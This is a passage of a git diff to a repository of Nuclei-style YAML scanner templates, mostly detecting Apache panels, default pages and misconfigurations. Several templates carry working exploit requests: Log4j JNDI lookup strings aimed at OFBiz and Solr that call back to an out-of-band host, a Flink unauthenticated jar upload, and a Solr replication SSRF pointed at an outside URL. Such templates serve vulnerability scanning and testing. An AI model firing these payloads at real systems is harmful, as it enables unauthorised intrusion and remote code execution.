apache,airflow,unauth metadata: shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth requests: - method: GET path: diff --git a/poc/apache/Apache-NiFi-rce.yaml b/poc/apache/Apache-NiFi-rce.yaml index b3f77b6915..3760ba9222 100644 --- a/poc/apache/Apache-NiFi-rce.yaml +++ b/poc/apache/Apache-NiFi-rce.yaml @@ -1,12 +1,10 @@ id: Apache-NiFi-rce - info: name: Apache NiFi系统API命令执行 author: Str1am severity: high reference: https://github.com/imjdl/Apache-NiFi-Api-RCE/blob/master/exp.py tags: NiFi,rce - requests: - method: GET path: diff --git a/poc/apache/apache-apisix-panel-337.yaml b/poc/apache/apache-apisix-panel-337.yaml deleted file mode 100644 index 6d3f464a45..0000000000 --- a/poc/apache/apache-apisix-panel-337.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apache-apisix-panel - -info: - name: Apache APISIX Panel detect - author: pikpikcu - severity: info - metadata: - fofa-query: title="Apache APISIX Dashboard" - tags: apache,apisix,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/user/login?redirect=%2F" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Apache APISIX Dashboard' - - - type: status - status: - - 200 diff --git a/poc/apache/apache-apisix-panel-338.yaml b/poc/apache/apache-apisix-panel-338.yaml new file mode 100644 index 0000000000..2c6124e710 --- /dev/null +++ b/poc/apache/apache-apisix-panel-338.yaml @@ -0,0 +1,30 @@ +id: apache-apisix-panel + +info: + name: Apache APISIX Login Panel + author: pikpikcu + severity: info + description: An Apache APISIX login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/user/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache APISIX Dashboard' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/poc/apache/apache-detect-348.yaml b/poc/apache/apache-detect-348.yaml deleted file mode 100644 index ba499c5ea5..0000000000 --- a/poc/apache/apache-detect-348.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apache-detect -info: - name: Apache Detection - author: philippedelteil - description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained - severity: info - tags: tech,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - - type: regex - part: header - regex: - - "Apache+" - - - type: status - status: - - 200 - - extractors: - - type: kval - part: header - kval: - - Server \ No newline at end of file diff --git a/poc/apache/apache-filename-enum-354.yaml b/poc/apache/apache-filename-enum-354.yaml new file mode 100644 index 0000000000..7eddfe01e9 --- /dev/null +++ b/poc/apache/apache-filename-enum-354.yaml @@ -0,0 +1,36 @@ +id: apache-filename-enum + +info: + name: Apache Filename Enumeration + author: geeknik + severity: low + description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. + reference: + - https://hackerone.com/reports/210238 + - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ + metadata: + max-request: 1 + tags: apache,misconfig,hackerone + +http: + - method: GET + + headers: + Accept: "fake/value" + path: + - "{{BaseURL}}/index" + + matchers-condition: and + matchers: + - type: status + status: + - 406 + + - type: word + words: + - "Not Acceptable" + - "Available variants:" + - "
Apache Server at" + condition: and + +# digest: 4b0a00483046022100b2ca66ab92aee03e5a60e28447ab4144da2ca1be69f322812581c250fac52b33022100f17850ca1f575b1427d7732e20795fb329445f7a3d7b68a8626a565502fa78a2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-filename-enum.yaml b/poc/apache/apache-filename-enum.yaml deleted file mode 100644 index 5a6f43d2f1..0000000000 --- a/poc/apache/apache-filename-enum.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apache-filename-enum - -info: - name: Apache Filename Enumeration - author: geeknik - severity: low - description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. - reference: - - https://hackerone.com/reports/210238 - - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ - tags: apache,misconfig - -requests: - - method: GET - headers: - Accept: "fake/value" - path: - - "{{BaseURL}}/index" - - matchers-condition: and - matchers: - - type: status - status: - - 406 - - type: word - words: - - "Not Acceptable" - - "Available variants:" - - "
Apache Server at" - condition: and diff --git a/poc/apache/apache-flink-unauth-rce-355.yaml b/poc/apache/apache-flink-unauth-rce-355.yaml index 196536f66e..dbae4dd542 100644 --- a/poc/apache/apache-flink-unauth-rce-355.yaml +++ b/poc/apache/apache-flink-unauth-rce-355.yaml @@ -1,14 +1,20 @@ id: apache-flink-unauth-rce + info: - name: Apache Flink Unauth RCE + name: Apache Flink - Remote Code Execution author: pikpikcu severity: critical + description: Apache Flink + reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-77 + metadata: + max-request: 1 tags: apache,flink,rce,intrusive,unauth - reference: - - https://www.exploit-db.com/exploits/48978 - - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - - https://github.com/LandGrey/flink-unauth-rce -requests: + +http: - raw: - | POST /jars/upload HTTP/1.1 @@ -21,6 +27,7 @@ requests: {{randstr}} --8ce4b16b22b58894aa86c421e8759df3-- + matchers-condition: and matchers: - type: word @@ -28,12 +35,16 @@ requests: - "application/json" part: header condition: and + - type: word words: - "success" - "_poc.jar" part: body condition: and + - type: status status: - 200 + +# digest: 4a0a00473045022100c23141a6f16f90c8fab66fa3b2c0a15f1a1e8764af83f977671389376049f79a02206e4a7c6f9fc1b8828421abed2d16188c020d5eb6277cfa5835a8d60a1314d352:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-flink-unauth-rce-356.yaml b/poc/apache/apache-flink-unauth-rce-356.yaml new file mode 100644 index 0000000000..196536f66e --- /dev/null +++ b/poc/apache/apache-flink-unauth-rce-356.yaml @@ -0,0 +1,39 @@ +id: apache-flink-unauth-rce +info: + name: Apache Flink Unauth RCE + author: pikpikcu + severity: critical + tags: apache,flink,rce,intrusive,unauth + reference: + - https://www.exploit-db.com/exploits/48978 + - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 + - https://github.com/LandGrey/flink-unauth-rce +requests: + - raw: + - | + POST /jars/upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 + + --8ce4b16b22b58894aa86c421e8759df3 + Content-Disposition: form-data; name="jarfile";filename="poc.jar" + Content-Type:application/octet-stream + + {{randstr}} + --8ce4b16b22b58894aa86c421e8759df3-- + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + condition: and + - type: word + words: + - "success" + - "_poc.jar" + part: body + condition: and + - type: status + status: + - 200 diff --git a/poc/apache/apache-guacamole-361.yaml b/poc/apache/apache-guacamole-361.yaml deleted file mode 100644 index 5bb875b5a0..0000000000 --- a/poc/apache/apache-guacamole-361.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: apache-guacamole - -info: - name: Apache Guacamole Login Page and version detection - author: r3dg33k - severity: info - metadata: - max-request: 1 - tags: apache,guacamole,tech,login - -http: - - method: GET - path: - - "{{BaseURL}}/translations/en.json" - - matchers-condition: and - matchers: - - type: word - words: - - 'Apache Guacamole' - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - '"VERSION":"[0-9]+\.2\.0"' - -# digest: 490a0046304402201c1e33f0ad9a3171cd4a145ce4f65e3f38a7889839979bf134926b1b305404ac022004790b5e2c61c406002a7bce3989c328859774f45cec314c0d69e07c131b9ea5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-guacamole.yaml b/poc/apache/apache-guacamole.yaml new file mode 100644 index 0000000000..263a49278b --- /dev/null +++ b/poc/apache/apache-guacamole.yaml @@ -0,0 +1,28 @@ +id: apache-guacamole + +info: + name: Apache Guacamole Login Page and version detection + author: r3dg33k + severity: info + tags: apache,guacamole,tech,login + +requests: + - method: GET + path: + - "{{BaseURL}}/translations/en.json" + + matchers-condition: and + matchers: + - type: word + words: + - 'Apache Guacamole' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - '"VERSION":"[0-9]+\.2\.0"' diff --git a/poc/apache/apache-nifi-rce.yaml b/poc/apache/apache-nifi-rce.yaml new file mode 100644 index 0000000000..82404c3542 --- /dev/null +++ b/poc/apache/apache-nifi-rce.yaml @@ -0,0 +1,36 @@ +id: apache-nifi-rce + +info: + name: Apache NiFi RCE + author: arliya + severity: high + description: | + Apache NiFi is designed for data streaming. It supports highly configurable data routing, transformation, and system mediation logic that indicate graphs. The system has unauthorized remote command execution vulnerability. + metadata: + verified: "true" + shodan-query: title:"NiFi" + tags: apache,nifi,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/nifi-api/process-groups/root" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "revision" + - "canRead" + - "permissions" + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 diff --git a/poc/apache/apache-ofbiz-log4j-rce-366.yaml b/poc/apache/apache-ofbiz-log4j-rce-366.yaml deleted file mode 100644 index d86db343ec..0000000000 --- a/poc/apache/apache-ofbiz-log4j-rce-366.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: apache-ofbiz-log4j-rce - -info: - name: Apache OFBiz Log4j JNDI RCE - author: pdteam - severity: critical - tags: ofbiz,oast,log4j,rce,apache,jndi - -requests: - - raw: - - | - GET /webtools/control/main HTTP/1.1 - Host: {{Hostname}} - Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - - type: regex - part: interactsh_request - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - - extractors: - - type: regex - part: interactsh_request - group: 1 - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/apache/apache-ofbiz-log4j-rce.yaml b/poc/apache/apache-ofbiz-log4j-rce.yaml new file mode 100644 index 0000000000..1d604b8057 --- /dev/null +++ b/poc/apache/apache-ofbiz-log4j-rce.yaml @@ -0,0 +1,28 @@ +id: apache-ofbiz-log4j-rce +info: + name: Apache OFBiz Log4j JNDI RCE + author: pdteam + severity: critical + tags: ofbiz,oast,log4j,rce,apache,jndi +requests: + - raw: + - | + GET /webtools/control/main HTTP/1.1 + Host: {{Hostname}} + Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}} + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/apache/apache-solr-log4j-CVE-2021-44228.yaml b/poc/apache/apache-solr-log4j-CVE-2021-44228.yaml index d118daac57..b6615fff92 100644 --- a/poc/apache/apache-solr-log4j-CVE-2021-44228.yaml +++ b/poc/apache/apache-solr-log4j-CVE-2021-44228.yaml @@ -1,15 +1,20 @@ id: apache-solr-log4j-CVE-2021-44228 + info: - name: Log4j (CVE-2021-44228) Detect for Apache Solr + name: Log4j (CVE-2021-44228) Detect for Apache Solr author: toramanemre severity: Critical + requests: - method: GET path: - "{{BaseURL}}/solr/admin/collections?action=${jndi:ldap://{{interactsh-url}}}&wt=json" + headers: Host: "{{Host}}" + matchers: + - type: word part: interactsh_protocol name: dns diff --git a/poc/apache/apache-solr-log4j-cve-2021-44228.yaml b/poc/apache/apache-solr-log4j-cve-2021-44228.yaml new file mode 100644 index 0000000000..d118daac57 --- /dev/null +++ b/poc/apache/apache-solr-log4j-cve-2021-44228.yaml @@ -0,0 +1,17 @@ +id: apache-solr-log4j-CVE-2021-44228 +info: + name: Log4j (CVE-2021-44228) Detect for Apache Solr + author: toramanemre + severity: Critical +requests: + - method: GET + path: + - "{{BaseURL}}/solr/admin/collections?action=${jndi:ldap://{{interactsh-url}}}&wt=json" + headers: + Host: "{{Host}}" + matchers: + - type: word + part: interactsh_protocol + name: dns + words: + - "dns" diff --git a/poc/apache/apache-solr-log4j-rce-372.yaml b/poc/apache/apache-solr-log4j-rce-372.yaml deleted file mode 100644 index bd31144333..0000000000 --- a/poc/apache/apache-solr-log4j-rce-372.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: apache-solr-log4j-rce - -info: - name: Apache Solr Log4j JNDI RCE - author: Evan Rubinstein,nvn1729 - severity: critical - description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. - reference: - - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 - - https://twitter.com/sirifu4k1/status/1470011568834424837 - - https://github.com/apache/solr/pull/454 - tags: solr,oast,log4j,rce,apache,jndi - -requests: - - method: GET - path: - - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - - type: regex - part: interactsh_request - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - - extractors: - - type: regex - part: interactsh_request - group: 1 - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/apache/apache-solr-log4j-rce.yaml b/poc/apache/apache-solr-log4j-rce.yaml index 825bad33de..bd31144333 100644 --- a/poc/apache/apache-solr-log4j-rce.yaml +++ b/poc/apache/apache-solr-log4j-rce.yaml @@ -1,77 +1,36 @@ id: apache-solr-log4j-rce info: - name: Apache Solr 7+ - Remote Code Execution (Apache Log4j) - author: Evan Rubinstein,nvn1729,j4vaovo + name: Apache Solr Log4j JNDI RCE + author: Evan Rubinstein,nvn1729 severity: critical - description: | - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. + description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. reference: - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 - https://twitter.com/sirifu4k1/status/1470011568834424837 - https://github.com/apache/solr/pull/454 - - https://logging.apache.org/log4j/2.x/security.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2021-44228 - cwe-id: CWE-77 - metadata: - verified: true - max-request: 2 - shodan-query: http.html:"Apache Solr" - tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev -variables: - rand1: '{{rand_int(111, 999)}}' - rand2: '{{rand_int(111, 999)}}' + tags: solr,oast,log4j,rce,apache,jndi -http: - - raw: - - | - @timeout: 25s - GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1 - Host: {{Hostname}} - - payloads: - endpoint: - - "collections" - - "cores" - attack: clusterbomb +requests: + - method: GET + path: + - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" matchers-condition: and matchers: - type: word - part: body - words: - - 'org.apache.solr' - - - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable extractors: - - type: kval - kval: - - interactsh_ip - - - type: regex - part: interactsh_request - group: 2 - regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - - type: regex part: interactsh_request group: 1 regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - -# digest: 4a0a00473045022100c38d41d1823fa63da240e259a1003d23723889cd20ac19f9eaab674d5664a03c022018ea30db1d9f2f1a5c8884ad3b21735fc7a02a73f18e35b35a7ff9506e56d4e9:922c64590222798bb761d5b6d8e72950 + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/apache/apache-storm-unauth.yaml b/poc/apache/apache-storm-unauth.yaml index 2a2c45e566..dc48849fe9 100644 --- a/poc/apache/apache-storm-unauth.yaml +++ b/poc/apache/apache-storm-unauth.yaml @@ -1,14 +1,20 @@ id: apache-storm-unauth + info: name: Apache Storm Unauth author: pikpikcu severity: medium - reference: https://storm.apache.org/releases/current/STORM-UI-REST-API.html + reference: + - https://storm.apache.org/releases/current/STORM-UI-REST-API.html + metadata: + max-request: 1 tags: apache,unauth,misconfig -requests: + +http: - method: GET path: - '{{BaseURL}}/api/v1/cluster/summary' + matchers-condition: and matchers: - type: word @@ -17,6 +23,9 @@ requests: - '"totalMem":' - '"stormVersion":' condition: and + - type: status status: - 200 + +# digest: 490a0046304402206445294e1d237514858065f44d0ca332874876a4071b4163c436a74f803abb6c022066822b6f0d9f4fa25b39da6bec4db4aef6067a7a6d78391697a8022dc4131691:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-tomcat-snoop-374.yaml b/poc/apache/apache-tomcat-snoop-374.yaml index 9cb1ec5328..15b5a1beab 100644 --- a/poc/apache/apache-tomcat-snoop-374.yaml +++ b/poc/apache/apache-tomcat-snoop-374.yaml @@ -5,9 +5,8 @@ info: author: pdteam severity: low description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection. - reference: - - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks - tags: apache,misconfig,tomcat,disclosure + reference: https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks + tags: apache requests: - method: GET @@ -22,4 +21,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/apache/apache-tomcat-snoop-377.yaml b/poc/apache/apache-tomcat-snoop-377.yaml new file mode 100644 index 0000000000..9cb1ec5328 --- /dev/null +++ b/poc/apache/apache-tomcat-snoop-377.yaml @@ -0,0 +1,25 @@ +id: apache-tomcat-snoop + +info: + name: Apache Tomcat example page disclosure - snoop + author: pdteam + severity: low + description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection. + reference: + - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks + tags: apache,misconfig,tomcat,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/examples/jsp/snp/snoop.jsp" + + matchers-condition: and + matchers: + - type: word + words: + - 'Request URI: /examples/jsp/snp/snoop.jsp' + + - type: status + status: + - 200 diff --git a/poc/apache/apachesolrlfissrf.yaml b/poc/apache/apachesolrlfissrf.yaml index c69e2990a7..823da4830c 100644 --- a/poc/apache/apachesolrlfissrf.yaml +++ b/poc/apache/apachesolrlfissrf.yaml @@ -1,38 +1,55 @@ id: CVE-2021-27905 info: - name: Apache Solr <= 8.8.1 SSRF & Arbitrary File Read - author: nithisshapachesolrlfissrf + name: Apache Solr <=8.8.1 - Server-Side Request Forgery + author: hackergautam severity: critical - tags: cve2021-27905,lfi,apache,solr,ssrf - reference: | - - - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 + description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. + remediation: This issue is resolved in Apache Solr 8.8.2 and later. + reference: + - https://www.anquanke.com/post/id/238201 + - https://ubuntu.com/security/CVE-2021-27905 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://lists.apache.org/thread.html/r0ddc3a82bd7523b1453cb7a5e09eb5559517145425074a42eb326b10%40%3Cannounce.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-27905 + cwe-id: CWE-918 + epss-score: 0.94485 + epss-percentile: 0.99023 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: solr + tags: cve,cve2021,apache,solr,ssrf -requests: +http: - raw: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} Accept-Language: en Connection: close - - | - GET /solr/%7Bcore%7D/replication/?command=fetchindex&masterUrl=https://bugbounty.requestcatcher.com/ssrf HTTP/1.1 + GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1 Host: {{Hostname}} Accept-Language: en Connection: close + matchers: + - type: word + part: body + words: + - 'OK' + extractors: - type: regex - regex: - - '"status"\:\{"(.*?)"\:\{"name"' - name: collection + name: core group: 1 - internal: true - - matchers: - - type: regex regex: - - "root:[x*]:0:0:" - part: body + - '"name"\:"(.*?)"' + internal: true +# digest: 4a0a00473045022100846d3f03cba36c9a29cae22437f54e258aecb3088b528499a473d5729922123b02200195825092238941d4a32c54d4735612308d7493d8ef0c31fd7df83b5552ecc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/apache/default-apache-test-all-6813.yaml b/poc/apache/default-apache-test-all-6813.yaml new file mode 100644 index 0000000000..4004d97de2 --- /dev/null +++ b/poc/apache/default-apache-test-all-6813.yaml @@ -0,0 +1,29 @@ +id: default-apache-test-all + +info: + name: Apache HTTP Server Test Page + author: andydoering + description: Detects default installations of apache (not just apache2 or installations on CentOS) + severity: info + tags: tech,apache + metadata: + shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: regex # type of the extractor + part: body # part of the response (header,body,all) + condition: or + regex: + - ".*?Apache(|\\d+) .*?(Default|Test).*?" + - "(Default|Test).*? Apache(|\\d+).*?" + + extractors: + - type: kval + part: header + kval: + - server \ No newline at end of file diff --git a/poc/apache/default-apache-test-all-6814.yaml b/poc/apache/default-apache-test-all-6814.yaml index 4004d97de2..480d651a06 100644 --- a/poc/apache/default-apache-test-all-6814.yaml +++ b/poc/apache/default-apache-test-all-6814.yaml @@ -3,11 +3,11 @@ id: default-apache-test-all info: name: Apache HTTP Server Test Page author: andydoering - description: Detects default installations of apache (not just apache2 or installations on CentOS) severity: info - tags: tech,apache + description: Detects default installations of apache (not just apache2 or installations on CentOS) metadata: shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" + tags: tech,apache requests: - method: GET @@ -15,8 +15,8 @@ requests: - '{{BaseURL}}' matchers: - - type: regex # type of the extractor - part: body # part of the response (header,body,all) + - type: regex # type of the extractor + part: body # part of the response (header,body,all) condition: or regex: - ".*?Apache(|\\d+) .*?(Default|Test).*?" @@ -26,4 +26,4 @@ requests: - type: kval part: header kval: - - server \ No newline at end of file + - server diff --git a/poc/apache/default-apache-test-all-6815.yaml b/poc/apache/default-apache-test-all.yaml similarity index 100% rename from poc/apache/default-apache-test-all-6815.yaml rename to poc/apache/default-apache-test-all.yaml diff --git a/poc/apache/default-apache-test-page-6818.yaml b/poc/apache/default-apache-test-page-6818.yaml index 268acbeed0..ade74d648c 100644 --- a/poc/apache/default-apache-test-page-6818.yaml +++ b/poc/apache/default-apache-test-page-6818.yaml @@ -5,11 +5,10 @@ info: author: dhiyaneshDk severity: info metadata: - max-request: 1 shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" tags: tech,apache -http: +requests: - method: GET path: - '{{BaseURL}}' @@ -19,5 +18,3 @@ http: words: - "Apache HTTP Server Test Page powered by CentOS" part: body - -# digest: 490a004630440220467bbb3dc60687ff2f264d427b2bbef67eaf91265d2792c09daa9032b6fa344802204ffb8d5ea0e7243efd0a890758cf097189637da7837623d9d55956ef739fc474:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache-test-page.yaml b/poc/apache/default-apache-test-page.yaml new file mode 100644 index 0000000000..69f573761a --- /dev/null +++ b/poc/apache/default-apache-test-page.yaml @@ -0,0 +1,17 @@ +id: default-apache-test-page +info: + name: Apache HTTP Server Test Page + author: dhiyaneshDk + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 + tags: tech,apache +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - "Apache HTTP Server Test Page powered by CentOS" + part: body diff --git a/poc/apache/default-apache2-ubuntu-page-6810.yaml b/poc/apache/default-apache2-ubuntu-page-6810.yaml index 3efd0d3dea..83b392e20a 100644 --- a/poc/apache/default-apache2-ubuntu-page-6810.yaml +++ b/poc/apache/default-apache2-ubuntu-page-6810.yaml @@ -5,19 +5,15 @@ info: author: dhiyaneshDk severity: info metadata: - max-request: 1 shodan-query: http.title:"Apache2 Ubuntu Default Page" tags: tech,apache -http: +requests: - method: GET path: - '{{BaseURL}}' - matchers: - type: word words: - "Apache2 Ubuntu Default Page: It works" part: body - -# digest: 4a0a00473045022100daed8690f24f8c0009d7167980aeee76223c786cfdcaf5b5c0e9ec6c830f5c240220648f0f8615f54d45ff1d6f251ef25e42441e1a12c23ee2a6864375e5fe44e494:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache2-ubuntu-page.yaml b/poc/apache/default-apache2-ubuntu-page.yaml new file mode 100644 index 0000000000..e5725ca657 --- /dev/null +++ b/poc/apache/default-apache2-ubuntu-page.yaml @@ -0,0 +1,17 @@ +id: default-apache2-ubuntu-page +info: + name: Apache2 Ubuntu Default Page + author: dhiyaneshDk + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22Apache2+Ubuntu+Default+Page%22 + tags: tech,apache +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - "Apache2 Ubuntu Default Page: It works" + part: body diff --git a/poc/api/alfacgiapi-wordpress-255.yaml b/poc/api/alfacgiapi-wordpress-255.yaml index 27d4456e69..69b0d39f88 100644 --- a/poc/api/alfacgiapi-wordpress-255.yaml +++ b/poc/api/alfacgiapi-wordpress-255.yaml @@ -1,5 +1,4 @@ id: alfacgiapi-wordpress - info: name: alfacgiapi author: pussycat0x @@ -7,7 +6,6 @@ info: description: Searches for sensitive directories present in the ALFA_DATA. reference: https://www.exploit-db.com/ghdb/6999 tags: wordpress,listing - requests: - method: GET path: diff --git a/poc/api/apache-apisix-panel-337.yaml b/poc/api/apache-apisix-panel-337.yaml deleted file mode 100644 index 6d3f464a45..0000000000 --- a/poc/api/apache-apisix-panel-337.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apache-apisix-panel - -info: - name: Apache APISIX Panel detect - author: pikpikcu - severity: info - metadata: - fofa-query: title="Apache APISIX Dashboard" - tags: apache,apisix,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/user/login?redirect=%2F" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Apache APISIX Dashboard' - - - type: status - status: - - 200 diff --git a/poc/api/apache-apisix-panel-338.yaml b/poc/api/apache-apisix-panel-338.yaml new file mode 100644 index 0000000000..2c6124e710 --- /dev/null +++ b/poc/api/apache-apisix-panel-338.yaml @@ -0,0 +1,30 @@ +id: apache-apisix-panel + +info: + name: Apache APISIX Login Panel + author: pikpikcu + severity: info + description: An Apache APISIX login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/user/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache APISIX Dashboard' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/poc/api/api-abuseipdb-384.yaml b/poc/api/api-abuseipdb-384.yaml new file mode 100644 index 0000000000..29bfe0170f --- /dev/null +++ b/poc/api/api-abuseipdb-384.yaml @@ -0,0 